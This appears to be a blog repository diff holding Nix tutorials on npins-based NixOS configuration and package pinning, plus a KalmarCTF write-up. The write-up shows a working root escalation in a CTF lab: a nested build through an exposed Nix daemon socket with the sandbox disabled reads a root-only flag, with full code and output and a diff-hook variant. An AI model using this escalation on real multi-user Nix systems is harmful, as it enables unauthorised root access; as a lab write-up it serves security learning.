`npins` is pretty much this at its core, but well-executed.
[npins]: https://github.com/andir/npins
[niv]: https://github.com/nmattia/niv
# Fixing the UX issues
We know that:
1. `<nixpkgs>` as seen by `nixos-rebuild` determines which version of nixpkgs
   is used to build the configuration.
2. The location of the configuration is simply determined by `<nixos-config>`.
3. Both instances of duplicate configuration evaluation are gated on `--fast`
   not being passed.
So, we just have to invoke `nixos-rebuild` with the right options and
`NIX_PATH` such that we get a config from the current directory with a
`nixpkgs` version determined by `npins`.
Let's set up npins, then write a simple shell script.
```
$ npins init --bare
$ npins add --name nixpkgs channel nixos-unstable
```
You can also use `nixos-23.11` (or future versions once they come out) in place
of `nixos-unstable` here, if you want to use a stable nixpkgs.
Time for a simple shell script. Note that this shell script uses `nix eval`,
which we at *Lix* are very unlikely to ever break in the future, but it does
require `--extra-experimental-features nix-command` as an argument if you don't
have the experimental feature enabled, or
`nix.settings.experimental-features = "nix-command"` in a NixOS config. (The
experimental feature can be hacked around with
`nix-instantiate --json --eval npins/default.nix -A nixpkgs.outPath | jq -r .`,
which works around `nix-instantiate --eval` missing a `--raw` flag, but this is
kind of pointless since we are about to use flakes features in a second)
```bash
#!/usr/bin/env bash
cd "$(dirname "$0")"
# assume that if there are no args, you want to switch to the configuration
cmd=${1:-switch}
shift
nixpkgs_pin=$(nix eval --raw -f npins/default.nix nixpkgs)
nix_path="nixpkgs=${nixpkgs_pin}:nixos-config=${PWD}/configuration.nix"
# without --fast, nixos-rebuild will compile nix and use the compiled nix to
# evaluate the config, wasting several seconds
sudo env NIX_PATH="${nix_path}" nixos-rebuild "$cmd" --fast "$@"
```
# Killing channels
Since the config now builds successfully without channels, we can kill them to
stop their reign of terror: we no longer need them to build the configuration
at all. Use `sudo nix-channel --list` and then `sudo nix-channel --remove
CHANNELNAME` on each one. While you're at it, you can also delete `/etc/nixos`
if you've moved your configuration to your home directory.
Now we have a NixOS configuration built without using channels, but once we are
running that system, `<nixpkgs>` will still refer to a channel (or nothing, if
the channels are deleted), since we didn't do anything to `NIX_PATH` on the
running system. Also, the `nixpkgs` flake reference will point to the latest
`nixos-unstable` at the time of running a command like `nix run nixpkgs#hello`.
Let's fix both of these things.
For context, *by default*, on NixOS 24.05 and later, due to [PR
254405](https://github.com/NixOS/nixpkgs/pull/254405), *flake*-based NixOS
configs get pinned `<nixpkgs>` and a pinned `nixpkgs` flake of the exact same
version as the running system, such that `nix-shell -p hello` and `nix run
nixpkgs#hello` give you the same `hello` every time: it will always be the same
one as if you put it in `systemPackages`. That setup works by setting
`NIX_PATH` to refer to the flake registry `/etc/nix/registry.json`, which then
is set to resolve `nixpkgs` to `/nix/store/xxx-source`, that is, the nixpkgs of
the current configuration.
We can bring the same niceness to non-flake configurations, with the exact same
code behind it, even!
Let's fix the `NIX_PATH`. Add this module worth of code into your config
somewhere, say, `pinning.nix`, then add it to `imports` of `configuration.nix`:
```nix
{ config, pkgs, ... }:
let
  sources = import ./npins;
in {
  # We need the flakes experimental feature to do the NIX_PATH thing cleanly
  # below. Given that this is literally the default config for flake-based
  # NixOS installations in the upcoming NixOS 24.05, future Nix/Lix releases
  # will not get away with breaking it.
  nix.settings = {
    experimental-features = "nix-command flakes";
  };

  # FIXME(24.05 or nixos-unstable): change following two rules to
  #
  #   nixpkgs.flake.source = sources.nixpkgs;
  #
  # which does the exact same thing, using the same machinery as flake configs
  # do as of 24.05.
  nix.registry.nixpkgs.to = {
    type = "path";
    path = sources.nixpkgs;
  };
  nix.nixPath = [ "nixpkgs=flake:nixpkgs" ];
}
```
# New workflow
When you want to update NixOS, use `npins update`, then `./rebuild.sh`
(`./rebuild.sh dry-build` to check it evaluates, `./rebuild.sh boot` to switch
on next boot, etc). If it works, commit it to Git. The version of nixpkgs comes
from exactly one place now, and it is tracked along with the changes to your
configuration. Builds are faster now since we don't evaluate the configuration
multiple times.
Multiple machines can no longer get desynchronized with each other. Config
commits *will* build to the same result in the future, since they are
self-contained now.
# Conclusion and analysis
As the NixOS development community, we really need to improve `nixos-rebuild`.
It embodies, at basically every juncture, obsolescent practices that confuse
users and waste time. Modern configurations should be using either
npins/equivalent or flakes, both of which should be equally valid and easy to
use choices in all our tooling.
Flags like `--no-build-nix` come from an era where people were building
flake-based configs from a Nix that didn't even *have* flakes, so they needed
to be able to switch to an entirely different *Nix* to be able to evaluate
their config. We should never be rebuilding Nix by default before re-evaluating
the configuration in 2024. The Nix language is much, much more stable these
days, almost frozen like a delicious ice cream cone, and so the idea of
someone's config requiring a brand new Nix to merely evaluate is bordering on
absurd.
It doesn't help that this old flakes hack actually breaks cross compiling
NixOS configs, for which `--fast` is thus mandatory. The re-execution of
`nixos-rebuild` is more excusable since there is [still work to do on that like
capturing output to the journal](https://github.com/NixOS/nixpkgs/pull/287968),
but it is still kind of bothersome to eat so much evaluation time for it; I
wonder if a happier medium is that it would just build `pkgs.nixos-rebuild`
instead of evaluating all the modules, but that has its own drawback of ignoring
overlays in the NixOS config...
Another tool that [needs rewriting, documentedly
so](https://github.com/NixOS/nixpkgs/issues/293543) is `nixos-option`, which is
a bad pile of C++ that doesn't support flakes, and which could be altogether
replaced by a short bit of very normal Nix code and a shell script.
There's a lot of work still to do on making NixOS and Nix a more friendly
toolset, and we hope you can join us. I (Jade) have been working along with
several friends on <https://lix.systems>, a soon-to-be-released fork of CppNix
2.18 focused on friendliness, stability, and future evolution. People
in our community have been working on these UX problems outside Nix itself
as well. We would love for these tools to be better for everyone.

View file

@@ -0,0 +1,310 @@
+++
date = "2024-05-19"
draft = false
path = "/blog/pinning-packages-in-nix"
tags = ["nix"]
title = "Pinning packages in Nix"
+++
Although Nix supposedly makes pinning things easy, it really does not seem so
when compared with other software that uses pinning: it is not possible to
simply write `package = "^5.0.1"` in some file somewhere and get *one* package
pinned at a specific version. Though this is frustrating, there is a reason for
it, and it primarily speaks to how nixpkgs is a Linux distribution and how Nix
is unlike a standard language package manager.
This post will go through the ways to pin a package to some older version and
why one would use each method.
# Simply add an older version of nixpkgs
> Software regressed? No patches in master to fix it? Try 30-40 different
versions of nixpkgs. An easy weeknight bug fix. You will certainly not regret
pinning 30-40 versions of nixpkgs.
Unlike most systems, it is fine to mix versions of nixpkgs, although it will
likely go wrong if, e.g. libraries are intermingled between versions (*in
particular*, it is inadvisable to replace some program with a version
from a different nixpkgs from within an overlay for this reason). But, if one
package is all that is necessary, one can in fact simply import another version
of nixpkgs.
This works because binaries from multiple versions of nixpkgs can coexist
on a computer and simply work. However, it can go wrong if they are loading
libraries at runtime, especially if the glibc version changes, especially if
`LD_LIBRARY_PATH` is involved. That failure mode is, however, rather loud and
obvious if it happens.
For example:
```nix
let
  pkgs1Src = builtins.fetchTarball {
    # https://github.com/nixos/nixpkgs/tree/nixos-23.11
    url = "https://github.com/nixos/nixpkgs/archive/219951b495fc2eac67b1456824cc1ec1fd2ee659.tar.gz";
    sha256 = "sha256-u1dfs0ASQIEr1icTVrsKwg2xToIpn7ZXxW3RHfHxshg=";
    name = "source";
  };
  pkgs2Src = fetchTarball {
    # https://github.com/nixos/nixpkgs/tree/nixos-unstable
    url = "https://github.com/nixos/nixpkgs/archive/d8fe5e6c92d0d190646fb9f1056741a229980089.tar.gz";
    sha256 = "sha256-iMUFArF0WCatKK6RzfUJknjem0H9m4KgorO/p3Dopkk=";
    name = "source";
  };
  pkgs1 = import pkgs1Src { };
  pkgs2 = import pkgs2Src { };
in
{
  env = pkgs1.buildEnv {
    name = "env";
    paths = [ pkgs1.vim pkgs2.hello ];
  };
  vim1 = pkgs1.vim;
  vim2 = pkgs2.vim;
}
```
Here we have an environment which is being built out of packages from two
different versions of nixpkgs, so that `result/bin/hello` is from `pkgs2` and
`result/bin/vim` is from `pkgs1`. This can equivalently be done for
`environment.systemPackages` or similar such things: to get another version of
nixpkgs into a NixOS configuration, one can:
- For flakes, one can inject the dependency [in some manner suggested by
"Flakes aren't real"][flakes-arent-real]. Or, one can do the
`builtins.fetchTarball` thing above.
- For non-flakes, one can do the `builtins.fetchTarball` thing shown above, or
add another input in [`npins`][npins]/Niv/etc, or add a second channel
(though we suggest migrating NixOS configs using channels to npins or
flakes so that the nixpkgs version is tracked in git).
[flakes-arent-real]: https://jade.fyi/blog/flakes-arent-real/
[npins]: https://github.com/andir/npins
```
» nix-build -A env /tmp/meow.nix
/nix/store/zilav8lqqgfgrk54wg88mdwq582hqdp9-env
~ » ./result/bin/hello --version | head -n1
hello (GNU Hello) 2.12.1
» ./result/bin/vim --version | head -n3
VIM - Vi IMproved 9.0 (2022 Jun 28, compiled Jan 01 1980 00:00:00)
Included patches: 1-2116
Compiled by nixbld
» nix eval -f /tmp/meow.nix vim1.version
"9.0.2116"
» nix eval -f /tmp/meow.nix vim2.version
"9.1.0148"
```
<dl>
<dt>Difficulty</dt>
<dd>Very easy</dd>
<dt>Rebuilds</dt>
<dd>
None, but will bring in another copy of nixpkgs and any dependencies (and
transitive dependencies).
</dd>
</dl>
# Vendor the package
Another way to pin one package is to vendor the package definition of the
relevant version. The easiest way to do this is to find the version of nixpkgs
with the desired package version and then copy the `package.nix` or
`default.nix` or such into your own project, and then call it with
`callPackage`.
You can find it with something like:
```
» nix eval --raw -f '<nixpkgs>' hello.meta.position
/nix/store/0qd773b63yg8435w8hpm13zqz7iipcbs-source/pkgs/by-name/he/hello/package.nix:41
```
Or, equivalently, in `nix repl -f '<nixpkgs>'`: `:e hello` opens the definition
in your editor, and `hello.meta.position` evaluates the same thing as above.
Then, vendor that file into your configurations repository.
Once it is vendored, it can be used either from an overlay:
```nix
final: prev: {
  hello = final.callPackage ./hello-vendored.nix { };
}
```
or directly in your use site:
```nix
{ pkgs, ... }: {
  environment.systemPackages = [
    (pkgs.callPackage ./hello-vendored.nix { })
  ];
}
```
<dl>
<dt>Difficulty</dt>
<dd>Slight effort</dd>
<dt>Rebuilds</dt>
<dd>
For the overlay use case, this will build the overridden package and anything
depending on it. For the direct use-at-site case, this will just rebuild the
package, and anything depending on it will get the version in upstream nixpkgs.
</dd>
</dl>
# Patch the package with overrides
nixpkgs offers several separate methods to "override" things, each meaning
something different. In short:
- [`somePackage.override`][override] replaces the dependencies of a package;
more specifically the dependencies injected by `callPackage`. It accepts an
attribute set but can also accept a lambda of one argument, providing the
previous dependencies of the package.
- [`somePackage.overrideAttrs`][overrideAttrs] replaces the `stdenv.mkDerivation`
arguments of a package. This lets you replace the `src` of a package, in
principle.
- [`overrideCabal`][overrideCabal] replaces the `haskellPackages.mkDerivation`
arguments for a Haskell package in a similar way that `overrideAttrs` does for
`stdenv.mkDerivation`. This is internally implemented by methods equivalent
to the evil crimes below.
[override]: https://nixos.org/manual/nixpkgs/stable/#sec-pkg-override
[overrideAttrs]: https://nixos.org/manual/nixpkgs/stable/#sec-pkg-overrideAttrs
[overrideCabal]: https://nixos.org/manual/nixpkgs/stable/#haskell-overriding-haskell-packages
Here are some examples:
Build an openttd with a different upstream source by putting this in
`openttd-jgrpp.nix`:
```nix
{ openttd, fetchFromGitHub }:
openttd.overrideAttrs (old: {
  src = fetchFromGitHub {
    owner = "jgrennison";
    repo = "openttd-patches";
    rev = "jgrpp-0.57.1";
    sha256 = "sha256-mQy+QdhEXoM9wIWvSkMgRVBXJO1ugXWS3lduccez1PQ=";
  };
})
```
then `pkgs.callPackage ./openttd-jgrpp.nix { }`.
For instance, the following (rather silly) command will build it:
```
» nix build -L --impure --expr 'with import <nixpkgs> {}; callPackage ./openttd-jgrpp.nix {}'
```
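By contrast, `.override` swaps the dependencies injected by `callPackage`
rather than the build arguments. A minimal sketch, assuming the package takes
`stdenv` from `callPackage` (as `hello` does):

```nix
with import <nixpkgs> { };
# replace the injected stdenv dependency: build GNU hello with clang
hello.override { stdenv = clangStdenv; }
```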
## Limitations
Most notably, [overrideAttrs doesn't work][overrideAttrs-busted] on several
significant language ecosystems including Rust and Go, since one almost always
needs to override the arguments of `buildRustPackage` or `buildGoPackage` when
replacing something. For these, either one can do crimes to introduce an
`overrideRust` function (see below), or one can cry briefly and then vendor the
package. The latter is easier.
```nix
let
  pkgs = import <nixpkgs> { };

  # Give the package a fake buildRustPackage from callPackage that modifies the
  # arguments through a function.
  overrideRust = f: drv: drv.override (oldArgs:
    let rustPlatform = oldArgs.rustPlatform or pkgs.rustPlatform;
    in oldArgs // {
      rustPlatform = rustPlatform // {
        buildRustPackage = args: rustPlatform.buildRustPackage (f args);
      };
    });

  # Take some arguments to buildRustPackage and make new ones. In this case,
  # override the version and the hash.
  evil = oldArgs: oldArgs // {
    src = oldArgs.src.override {
      rev = "v0.20.9";
      sha256 = "sha256-NxWqpMNwu5Ajffw1E2q9KS4TgkCH6M+ctFyi9Jp0tqQ=";
    };
    version = "master";
    # FIXME: if you are actually doing this put a real hash here
    cargoSha256 = pkgs.lib.fakeHash;
  };
in
{
  x = overrideRust evil pkgs.tree-sitter;
}
```
[overrideAttrs-busted]: https://github.com/NixOS/nixpkgs/issues/99100
Then: `nix build -L -f evil.nix x`
<dl>
<dt>Difficulty</dt>
<dd>Highly variable, sometimes trivial, sometimes nearly impossible, depending
on architectural flaws of nixpkgs.</dd>
<dt>Rebuilds</dt>
<dd>
For the overlay use case of actually using this overridden package, this will
build the overridden package and anything depending on it. For the direct
use-at-site case, this will just rebuild the package, and anything depending on
it will get the version in upstream nixpkgs.
</dd>
</dl>
# Patch a NixOS module
If one wants to replace a NixOS module, say, by getting it from a later version
of nixpkgs, see [Replacing Modules] in the NixOS manual.
[Replacing Modules]: https://nixos.org/manual/nixos/stable/#sec-replace-modules
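The mechanism described there is `disabledModules` plus importing the
replacement; a minimal sketch (the module path here is illustrative, not a
real one):

```nix
{ ... }:
let
  # hypothetical pin of a newer nixpkgs, e.g. from npins
  newerNixpkgs = (import ./npins).nixpkgs;
in {
  # drop the module shipped with the nixpkgs this system is built from...
  disabledModules = [ "services/misc/example-service.nix" ];
  # ...and import the same module from the newer tree instead
  imports = [ "${newerNixpkgs}/nixos/modules/services/misc/example-service.nix" ];
}
```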
# Patch the base system without a world rebuild
It's possible to replace an entire store path with another inside a NixOS
system without rebuilding the world, at the cost of wasting some space (by
duplicating things for the rewritten version) and being somewhat
evil/potentially unsound, since it is just a text replacement of the hashes.
This can be achieved with the NixOS option
[`system.replaceRuntimeDependencies`][replaceRuntimeDependencies].
[replaceRuntimeDependencies]: https://nixos.org/manual/nixos/stable/options#opt-system.replaceRuntimeDependencies
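A minimal sketch of the option's shape (the patched package is illustrative):

```nix
{ pkgs, ... }: {
  system.replaceRuntimeDependencies = [
    {
      original = pkgs.libfoo; # hypothetical package
      replacement = pkgs.libfoo.overrideAttrs (old: {
        patches = (old.patches or [ ]) ++ [ ./urgent-fix.patch ];
      });
    }
  ];
}
```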
# Why do we need all of this?
The primary reason that Nix doesn't allow trivially overriding packages with a
different version is that it is a generalized build system building software
that has non-uniform expectations of how to be built. One can indeed see
that the "replace one version with some other in some file" idea is *almost*
reality in languages that use `mkDerivation` directly, though one might have to
tweak other build properties sometimes. Architectural problems in nixpkgs
prevent this working for several ecosystems, though.
Another sort of issue is that nixpkgs tries to provide a mostly [globally
coherent] set of software versions, where, like most Linux distributions, there
is generally one blessed version of a library with some exceptions. This is, in
fact, mandatory to be able to have any cache hits as a hermetic build system:
if everyone were building slightly different versions of libraries, all
downstream packages would have different hashes and thus miss the cache.
So, in a way, a software distribution based on Nix cannot have separate locking
for every package and simultaneously have functional caches: the moment that
everything is not built together, caches will miss.
[globally coherent]: https://www.haskellforall.com/2022/05/the-golden-rule-of-software.html

View file

@ -0,0 +1,295 @@
+++
date = "2024-03-16"
draft = false
path = "/blog/reproducible-pwning-writeup"
tags = ["ctf", "nix"]
title = "KalmarCTF: Reproducible Pwning writeup"
+++
I was making memes in the CTF room until someone told me Nix showed up
on a CTF, and well. It doesn't take that much to tempt me.
Reproducible Pwning is a challenge written by
[niko](https://hachyderm.io/@nrab), which involves a NixOS VM you're supposed
to root. The build user is not notably privileged.
There is a flag in `/data` which is mounted from the host via some means. That
directory is only readable by root.
There is a patch to the Nix evaluator. Interesting:
```patch
diff --git a/src/libutil/config.cc b/src/libutil/config.cc
index 37f5b50c7..fd824ee03 100644
--- a/src/libutil/config.cc
+++ b/src/libutil/config.cc
@@ -1,3 +1,4 @@
+#include "logging.hh"
 #include "config.hh"
 #include "args.hh"
 #include "abstract-setting-to-json.hh"
@@ -17,6 +18,16 @@ Config::Config(StringMap initials)
 
 bool Config::set(const std::string & name, const std::string & value)
 {
+    if (name.find("build-hook") != std::string::npos
+        || name == "accept-flake-config"
+        || name == "allow-new-privileges"
+        || name == "impure-env") {
+        logWarning({
+            .msg = hintfmt("Option '%1%' is too dangerous, skipping.", name)
+        });
+        return true;
+    }
+
     bool append = false;
     auto i = _settings.find(name);
     if (i == _settings.end()) {
```
The machine is configured with the following NixOS module, which I pulled out
of the included flake. The rest of the flake is normal stuff. There are a few
things that stand out to me:
- sudo is disabled, polkit is disabled: we are probably not looking for some
setuid exploit
- There are some *extremely* nonstandard Nix config settings being applied
```nix
({pkgs, ...}: {
  nixpkgs.hostPlatform = "x86_64-linux";
  nixpkgs.overlays = [
    (final: prev: {
      # JADE: likely vulnerable to puck's CVE, but I doubt that is the bug cuz they
      # added a patch and there is other funny business up.
      nix = final.nixVersions.nix_2_13.overrideAttrs {
        patches = [ ./nix.patch ];
        # JADE: due to broken integration tests, almost certainly
        doInstallCheck = false;
      };
    })
  ];

  # JADE: no interesting setuid binaries
  security = {
    sudo.enable = false;
    polkit.enable = false;
  };

  systemd.services.nix-daemon.serviceConfig.EnvironmentFile = let
    # JADE: here is the wacky part of the config.
    # This exposes the Nix daemon socket inside the sandbox (this is mostly
    # never the case unless using recursive-nix). So we are going to
    # be running a nix build inside a nix build to do something.
    sandbox = pkgs.writeText "nix-daemon-config" ''
      extra-sandbox-paths = /tmp/daemon=/nix/var/nix/daemon-socket/socket
    '';
    # JADE: I don't know what this does, so we are going to be reading some C++Nix
    # source code. But it sure smells like running the build as root.
    buildug = pkgs.writeText "nix-daemon-config" ''
      build-users-group =
    '';
  in
    # JADE: Sets additional config files to only the nix daemon. This is
    # documented in the Nix manual.
    pkgs.writeText "env" ''
      NIX_USER_CONF_FILES=${sandbox}:${buildug}
    '';
})
```
Here is the rest of the module, which is uninteresting:
{% codesample(desc="`boring-module.nix`") %}
```nix
{ ... }: {
# JADE: what the heck is this? It seems like some kind of kernel-problems
# storage thing. Later found out this is nothing.
environment.etc."systemd/pstore.conf".text = ''
[PStore]
Unlink=no
'';
users.users.root.initialHashedPassword = "x";
users.users.user = {
isNormalUser = true;
initialHashedPassword = "";
group = "user";
};
users.groups.user = {};
system.stateVersion = "22.04";
services.openssh = {
enable = true;
settings.PermitRootLogin = "no";
};
# JADE: save some image size
environment.noXlibs = true;
documentation.man.enable = false;
documentation.doc.enable = false;
fonts.fontconfig.enable = false;
nix.settings = {
# JADE: this option has no interesting security impact, just whether you
# can build during evaluation phase.
allow-import-from-derivation = false;
experimental-features = ["flakes" "nix-command" "repl-flake" "no-url-literals"];
};
}
```
{% end %}
So, to sum up:
- We have a Nix daemon socket in the sandbox.
- We are running builds with some weird group.
- Several config settings that make trusted users effectively root are
blocked by the patch. Interesting. We probably become a trusted user then.
So like, let's run some build.
```nix
let
nixpkgs = builtins.fetchTarball {
url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz";
"sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h";
};
pkgs = import nixpkgs {};
in
pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } ''
id -a
''
```
This gives me:
```
this derivation will be built:
/nix/store/958afc87nsfhwlm6b62z2xksmlaawsqg-meow.drv
building '/nix/store/958afc87nsfhwlm6b62z2xksmlaawsqg-meow.drv'...
uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld)
```
Hm. Boring, I was expecting to be root already.
But why is there a socket in there? Let's try invoking another build inside
our build, maybe? And, on the assumption that we must be a trusted user (since
I can't think of any other reason interaction with the bind-mounted socket
would differ from inside the sandbox), let's try just turning off the sandbox
in the inner build and see what happens.
```nix
let
nixpkgs = builtins.fetchTarball {
url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz";
"sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h";
};
pkgs = import nixpkgs {};
# dont worry about the contents quite yet
hax = pkgs.writeText "hax" (builtins.readFile ./stage2.nix);
in
pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } ''
id -a
nix-build --option sandbox false --extra-experimental-features 'flakes nix-command' --store unix:///tmp/daemon ${hax}
''
```
and `stage2.nix`:
```nix
let
pkgs = import (builtins.getEnv "PKGS") { };
in
pkgs.runCommand "meow2" { } ''
echo MEOW2
id -a
''
```
This outputs:
```
this derivation will be built:
/nix/store/iynjhk5a5ymp26cbyp22l15ix4lrp2f6-meow.drv
building '/nix/store/iynjhk5a5ymp26cbyp22l15ix4lrp2f6-meow.drv'...
uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld)
this derivation will be built:
/nix/store/cyw7kaqazdpgpna0jmaw7cw5348srvv3-meow2.drv
building '/nix/store/cyw7kaqazdpgpna0jmaw7cw5348srvv3-meow2.drv'...
MEOW2
uid=0(root) gid=0(root) groups=0(root)
```
Welp, I am root. Change stage 2 to `cat /data/*` and we have a flag:
```
[user@nixos:~]$ cat >stage1.nix <<-'EOF'
> let
nixpkgs = builtins.fetchTarball {
url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz";
"sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h";
};
pkgs = import nixpkgs {};
hax = pkgs.writeText "hax" (builtins.readFile ./stage2.nix);
in
pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } ''
id -a
nix-build --option sandbox false --extra-experimental-features 'flakes nix-command' --store unix:///tmp/daemon ${hax}
''
> EOF
[user@nixos:~]$ cat >stage2.nix <<-'EOF'
> let
pkgs = import (builtins.getEnv "PKGS") { };
in
pkgs.runCommand "meow2" { } ''
echo MEOW2
id -a
ls / || true
ls /data || true
cat /data/*
''
> EOF
[user@nixos:~]$ nix-build stage1.nix
warning: Nix search path entry '/nix/var/nix/profiles/per-user/root/channels' does not exist, ignoring
these 2 derivations will be built:
/nix/store/gzniydj0mayvzs7hin3v3j1643fjzrq3-hax.drv
/nix/store/m4gjzvkjks5n1zr54cxjzmwav0g9zzj1-meow.drv
these 11 paths will be fetched (3.92 MiB download, 23.41 MiB unpacked):
<SNIP>
building '/nix/store/gzniydj0mayvzs7hin3v3j1643fjzrq3-hax.drv'...
warning: Option 'accept-flake-config' is too dangerous, skipping.
warning: Option 'allow-new-privileges' is too dangerous, skipping.
warning: Option 'build-hook' is too dangerous, skipping.
warning: Option 'post-build-hook' is too dangerous, skipping.
warning: Option 'pre-build-hook' is too dangerous, skipping.
building '/nix/store/m4gjzvkjks5n1zr54cxjzmwav0g9zzj1-meow.drv'...
uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld)
this derivation will be built:
/nix/store/nv5j8z6w8zw0s6gjrmajy0wn7f2azfc0-meow2.drv
warning: Option 'accept-flake-config' is too dangerous, skipping.
warning: Option 'allow-new-privileges' is too dangerous, skipping.
warning: Option 'build-hook' is too dangerous, skipping.
warning: Option 'post-build-hook' is too dangerous, skipping.
warning: Option 'pre-build-hook' is too dangerous, skipping.
building '/nix/store/nv5j8z6w8zw0s6gjrmajy0wn7f2azfc0-meow2.drv'...
MEOW2
uid=0(root) gid=0(root) groups=0(root)
bin dev home lib64 proc run sys usr
data etc lib nix root srv tmp var
flag
kalmar{0nlyReproduc1bleMisconfigurationsH3R3}
```
I was informed later that I had found an unintended solution, and one was not
supposed to "simply set `sandbox = false`". The intended solution was to either
use the `diff-hook` setting, which is run as the daemon's user (like
`post-build-hook` and `build-hook`, which were conspicuously also banned), or
to abuse being root to tamper with the inputs to the derivation and overwrite
something run by a privileged user.
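For completeness, here is a rough sketch of how I imagine the `diff-hook`
route would go; this is untested and the details are my assumptions, not the
challenge author's solution. `diff-hook` and `run-diff-hook` are real Nix
settings, the hook is executed by the daemon itself (root here, given the
empty `build-users-group`), and it fires when a `--check` rebuild doesn't
match the existing output.

```nix
# Untested sketch. Build this once through the bind-mounted socket, then
# again with --check and the hook options set, something like:
#   nix-build --store unix:///tmp/daemon \
#     --option run-diff-hook true --option diff-hook "$hookPath" \
#     --check flaky.nix
# The output differs every build, so --check mismatches and the daemon
# runs the hook as its own user. $hookPath is a placeholder for a script
# in the store that does something like `cat /data/*`.
let
  pkgs = import (builtins.getEnv "PKGS") { };
in
pkgs.runCommand "flaky" { } ''
  date +%s%N > $out
''
```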
I don't think the unintended solution was that bad, though, because once you
are a trusted user, the Nix codebase assumes that you can just root the box.

View file
@@ -17,6 +17,8 @@
<!-- <meta name="description" content="{{ config.description }}"> -->
<meta property="og:description" content="{{ config.description }}" />
<link href="https://hachyderm.io/@leftpaddotpy" rel="me">
<title>{{ config.title }}</title>
<meta property="og:title" content="{{ config.title }}" />
<meta property="og:url" content="{{ current_url | safe }}" />